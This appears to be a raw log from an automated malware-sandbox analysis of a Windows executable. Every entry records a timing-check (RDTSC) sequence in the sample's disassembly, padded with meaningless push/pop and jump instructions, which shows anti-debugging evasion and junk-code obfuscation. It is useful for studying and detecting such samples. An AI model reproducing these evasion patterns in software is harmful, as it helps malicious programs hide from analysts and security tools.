Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10ED396 second address: 10ED3BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE9093D6546h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10ED3BD second address: 10ED3ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE908EE7115h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FE908EE7115h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 111ABDB second address: 111ABE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 111ABE1 second address: 111ABEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 111ABEA second address: 111ABEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 111ABEE second address: 111AC08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE908EE710Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jne 00007FE908EE7106h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 111AD8C second address: 111AD90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 111AD90 second address: 111AD94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 111B08A second address: 111B09B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE9093D6536h 0x0000000a push eax 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 111E5CA second address: 111E5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 111DBCC second address: 111DBD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 111DBD0 second address: 111DBEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE908EE710Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 111DBEA second address: 111DBEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 111DBEE second address: 111DBF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 111ED71 second address: 111EDB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jp 00007FE9093D6553h 0x0000000e pushad 0x0000000f jmp 00007FE9093D6549h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FE9093D653Eh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 111EDB0 second address: 111EDCA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FE908EE710Dh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 111EDCA second address: 111EDE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE9093D6546h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 111EDE8 second address: 111EDEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 112133C second address: 1121346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE9093D6536h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 112592A second address: 1125936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE908EE7106h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1125936 second address: 1125946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 js 00007FE9093D6536h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1125BE9 second address: 1125BF3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE908EE7106h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1125BF3 second address: 1125C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1125ED6 second address: 1125EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1125EDC second address: 1125EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1125EE7 second address: 1125EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1125EED second address: 1125EFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FE9093D6536h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 112602E second address: 1126045 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FE908EE7106h 0x00000011 jne 00007FE908EE7106h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1128850 second address: 1128854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 112890C second address: 1128912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1128912 second address: 1128916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1128A6B second address: 1128A70 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1129A9E second address: 1129AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1129B39 second address: 1129B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1129B3F second address: 1129B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 nop 0x00000007 mov dword ptr [ebp+12A31EA9h], eax 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f push eax 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push edx 0x00000017 pop edx 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1129B5F second address: 1129B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 112D02C second address: 112D030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 112E5DC second address: 112E5E7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11305ED second address: 11305F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1130BBA second address: 1130C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edi 0x00000008 jp 00007FE908EE7108h 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop edi 0x00000011 nop 0x00000012 mov dword ptr [ebp+12A31AE6h], edi 0x00000018 push 00000000h 0x0000001a jmp 00007FE908EE7113h 0x0000001f push 00000000h 0x00000021 xchg eax, esi 0x00000022 push ecx 0x00000023 jmp 00007FE908EE710Eh 0x00000028 pop ecx 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jbe 00007FE908EE7108h 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1130E60 second address: 1130E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1131DB2 second address: 1131DB7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1132BE9 second address: 1132BEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1132BEF second address: 1132C1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FE908EE7116h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c js 00007FE908EE7126h 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007FE908EE7106h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11349AD second address: 11349FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6540h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+12BCF25Ch], esi 0x00000010 add edi, 1E309271h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007FE9093D6538h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 push 00000000h 0x00000034 mov ebx, dword ptr [ebp+12A336C7h] 0x0000003a xchg eax, esi 0x0000003b pushad 0x0000003c js 00007FE9093D653Ch 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11349FE second address: 1134A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 jmp 00007FE908EE7113h 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1134A1F second address: 1134A25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1135A11 second address: 1135A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE908EE7106h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jg 00007FE908EE7106h 0x00000016 jmp 00007FE908EE7116h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1134BF5 second address: 1134BF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1134BF9 second address: 1134C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1134C06 second address: 1134C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1134C0A second address: 1134C13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 11379E4 second address: 11379E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1137B3C second address: 1137B8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7113h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov di, bx 0x0000000f push dword ptr fs:[00000000h] 0x00000016 movzx edi, ax 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 mov dword ptr [ebp+12BD3A90h], ecx 0x00000026 mov eax, dword ptr [ebp+12A30305h] 0x0000002c jno 00007FE908EE710Ch 0x00000032 push FFFFFFFFh 0x00000034 clc 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push ebx 0x00000039 push esi 0x0000003a pop esi 0x0000003b pop ebx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1137B8C second address: 1137B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9093D653Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 113A760 second address: 113A765 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 113B95D second address: 113B970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE9093D653Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 113BA78 second address: 113BA90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE710Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FE908EE710Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 113D92E second address: 113D966 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE9093D6538h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 pop esi 0x00000011 nop 0x00000012 and ebx, dword ptr [ebp+12A31865h] 0x00000018 push 00000000h 0x0000001a jnp 00007FE9093D6539h 0x00000020 push 00000000h 0x00000022 push esi 0x00000023 or dword ptr [ebp+12BB2F60h], eax 0x00000029 pop ebx 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e push eax 0x0000002f pop eax 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 113D966 second address: 113D96C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 113BA90 second address: 113BA9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 113BA9B second address: 113BA9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 113EA48 second address: 113EA4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 113EA4C second address: 113EA50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 113EA50 second address: 113EA56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 113FA57 second address: 113FA5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 113FA5D second address: 113FA61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10E839B second address: 10E83AF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FE908EE710Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 10E83AF second address: 10E83B5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1149C1C second address: 1149C20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1149C20 second address: 1149C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1149C28 second address: 1149C41 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jno 00007FE908EE7106h 0x00000009 pop esi 0x0000000a push ecx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007FE908EE7106h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1149C41 second address: 1149C45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1149C45 second address: 1149C65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jnp 00007FE908EE7106h 0x0000000f jmp 00007FE908EE710Dh 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1149C65 second address: 1149C6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1149DB1 second address: 1149DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1149EDA second address: 1149EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FE9093D6536h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1149EE5 second address: 1149EEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1149EEB second address: 1149F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9093D6549h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 114E5CE second address: 114E5EF instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE908EE711Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 114E5EF second address: 114E5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 114E5F3 second address: 114E606 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE710Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 114EE86 second address: 114EE8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 114EE8C second address: 114EEA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b jng 00007FE908EE7108h 0x00000011 pushad 0x00000012 popad 0x00000013 jl 00007FE908EE710Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 114EFB6 second address: F80AE4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jno 00007FE9093D6537h 0x0000000f push dword ptr [ebp+12A307E9h] 0x00000015 clc 0x00000016 call dword ptr [ebp+12A31BC9h] 0x0000001c pushad 0x0000001d or dword ptr [ebp+12A31BB4h], eax 0x00000023 xor eax, eax 0x00000025 mov dword ptr [ebp+12A31BB4h], esi 0x0000002b mov edx, dword ptr [esp+28h] 0x0000002f jc 00007FE9093D654Eh 0x00000035 jmp 00007FE9093D6548h 0x0000003a mov dword ptr [ebp+12A33867h], eax 0x00000040 mov dword ptr [ebp+12A3193Dh], ebx 0x00000046 jmp 00007FE9093D6540h 0x0000004b mov esi, 0000003Ch 0x00000050 jg 00007FE9093D6537h 0x00000056 stc 0x00000057 add esi, dword ptr [esp+24h] 0x0000005b jnc 00007FE9093D654Ch 0x00000061 lodsw 0x00000063 clc 0x00000064 add eax, dword ptr [esp+24h] 0x00000068 jmp 00007FE9093D6549h 0x0000006d mov ebx, dword ptr [esp+24h] 0x00000071 cld 0x00000072 nop 0x00000073 push edi 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 popad 0x00000078 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 1154859 second address: 115485D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
